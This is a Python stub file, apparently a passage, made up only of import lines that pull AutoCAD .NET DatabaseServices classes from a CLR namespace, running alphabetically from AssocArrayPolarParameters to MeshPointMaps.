from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayPolarParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocArrayRectangularParameters
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocAsmBodyActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocBlendSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocCompoundActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocConstraintType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDependency
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDependencyBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDependencyPE
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDimDependencyBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDimDependencyBodyBase
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocDraggingState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEdgeActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEdgeChamferActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEdgeFilletActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEvaluationCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEvaluationMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocEvaluationPriority
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocExtendSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocExtrudedSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocFaceActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocFilletSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocGeomDependency
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocGlobalUtility
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocLoftedSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocNetwork
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocNetworkSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocObjectTransaction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocOffsetSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocParamBasedActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPatchSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPathActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPathBasedSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPersSubentityId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPersSubentityIdPE
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocPlaneSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocRevolvedSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocSimplePersSubentId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocSingleEdgePersSubentId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocSweptSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocTransformationType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocTrimSurfaceActionBody
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocValueDependency
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocValueProviderPE
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocVariable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocVariableCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AssocVertexActionParam
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AttachmentPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AttributeCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AttributeDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AttributeReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AuditInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AuditPass
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import AutoConstrainEvaluationCallback
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Background
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginInsertEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginInsertEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockBlockEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockBlockEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockEntireDatabaseEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockEntireDatabaseEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockObjectsEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockObjectsEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockSelectedObjectsEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BeginWblockSelectedObjectsEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlendOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlendOptionsBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockBegin
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockConnectionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockEnd
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockInsertionPointsEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockInsertionPointsEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTableColumn
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTableColumnCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTableRow
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockPropertiesTableRowCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockScaling
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BlockTableRecordEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Body
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BooleanOperationType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BulgeVertex
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import BulgeVertexCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CallerMustCloseAttribute
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Cell
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellAlignment
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellBorder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellBorders
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellClass
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellContent
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellContentLayout
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellContentsCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellContentTypes
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellEdgeMasks
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellMargins
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellRange
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellStates
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CellType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CenterPointConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Circle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ClipBoundaryType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ColinearConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CollisionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Column
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ColumnsCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ColumnType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CompositeConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CompoundObjectId
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConcentricConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Constrained2PointsConstructionLine
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedArc
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedBoundedEllipse
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedBoundedLine
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedCircle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedConstructionLine
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedCurve
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedDatumLine
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedEllipse
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedGeometry
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedImplicitPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedLine
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedRigidSet
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainedSpline
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstraintGroupNode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ConstrainType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ContentType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Curve
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CustomObjectSnapMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import CustomScale
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataAdapter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataAdapterManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataAdapterProvider
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataAdapterSourceFilesException
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Database
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DatabaseIOEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DatabaseIOEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DatabaseSummaryInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DatabaseSummaryInfoBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataCell
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataCellCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataColumn
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataLink
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataLinkGetSourceContext
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataLinkManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataLinkOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DataTypeParameter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBDictionary
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBDictionaryEntry
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DbDictionaryEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DbHomeView
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBObject
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBObjectCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBObjectReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBObjectReferenceCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBPoint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBText
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DBVisualStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DecomposeForSaveReplacementRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DeepCloneType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DefaultLightingType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailSymbol
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailSymbolBoundaryType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailSymbolOverriddenProperty
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailViewIdentifierPlacement
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailViewModelEdge
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DetailViewStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DgnDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DgnReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DgnUnderlayItem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DiametricDimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DictionaryWithDefaultDictionary
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimArrowFlag
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Dimension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimensionCenterMarkType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimensionStyleOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimStyleTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DimStyleTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DistanceConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DragStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DrawLeaderOrderType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DrawMLeaderOrderType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DrawOrderTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DuplicateRecordCloning
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DwfDefinition
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DwfReference
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DwgFiler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DwgVersion
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DxfCode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DxfFiler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicBlockReferenceProperty
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicBlockReferencePropertyCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicBlockReferencePropertyCollectionEnumerator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicBlockReferencePropertyUnitsType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicDimensionChangedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicDimensionData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import DynamicDimensionDataCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EdgeRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Ellipse
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EndCap
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Entity
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EntityAlignmentEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EntityAlignmentEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EntityVisualStyleType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EnumConverter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualCurvatureConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualDistanceConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualHelpParameterConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualLengthConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EqualRadiusConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import EraseFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ExplicitConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Extents2d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Extents3d
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ExtrudedSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Face
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FaceRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FaceRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FeatureControlFrame
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Field
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldCodeFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldCodeWithChildren
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationContext
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationResult
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldEvaluationStatusResult
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldFilingOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FieldState
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FileDependencyInfo
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FileDependencyManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FileOpenMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FilerType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FilletTrimMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FindFileHint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FitData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FixedConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FlowDirection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Font
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FormatOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FormattedTableData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FrameSetting
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FullDwgVersion
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import FullSubentityPath
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import G2SmoothConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCoordinateCategory
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCoordinateSystem
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCoordinateTransformer
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCSProjectionCode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCSType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoCSUnit
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoLocationData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeomapImage
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeometricalConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeometryOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeomRef
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GeoPositionMarker
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GetGripPointsFlags
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GradientBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GradientColor
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GradientPatternType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Graph
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GraphicsMetafileType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GraphNode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GraphNodeCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GridLineStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GridLineType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GridProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GridPropertyParameter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripDataCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripMode
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripModeCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GripStatus
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GroundPlaneBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Group
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import GsMarkType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Handle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Hatch
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchEdgeType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchLoop
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchLoopTypes
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchObjectType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchPatternType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HatchStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Helix
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HelpParameter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HighlightOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HighlightStateOverrule
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HorizontalConstraint
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HostApplicationServices
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HyperLink
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import HyperLinkCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IBLBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IdMapping
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IdMappingEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IdMappingEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IdPair
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Image
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ImageBackground
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ImageDisplayOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ImageQuality
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ImplicitPointType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IndexCreation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import InterferenceProtocolExtension
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Intersect
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import IParameter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ISpecialValueConverter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ISubObject
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ItemLocator
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import ITextEditorSelectable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import JoinStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LampColorPreset
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LampColorType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerEvaluation
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateDeletedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateDeletedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateMasks
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateRenameEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerStateRenameEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayerViewportProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Layout
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutCopiedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutCopiedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutManager
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutRenamedEventArgs
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LayoutRenamedEventHandler
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Leader
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LeaderDirectionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LeaderType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Light
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LightingUnits
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Line
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LineAngularDimension2
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LineSpacingStyle
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LinetypeTable
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LinetypeTableRecord
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LineWeight
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LineWeightConverter
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LinkedData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LinkedTableData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftedSurface
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftOptions
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftOptionsBuilder
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftOptionsCheckCurvesOut
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftOptionsNormalOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LoftProfile
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LongTransaction
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import LongTransactionType
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MaintenanceReleaseVersion
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MatchProperties
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import Material
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeasurementValue
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MentalRayRenderSettings
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MergeCellStyleOption
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeshDataCollection
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeshFaceterData
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeshPointMap
from __clrclasses__.Autodesk.AutoCAD.DatabaseServices import MeshPointMaps
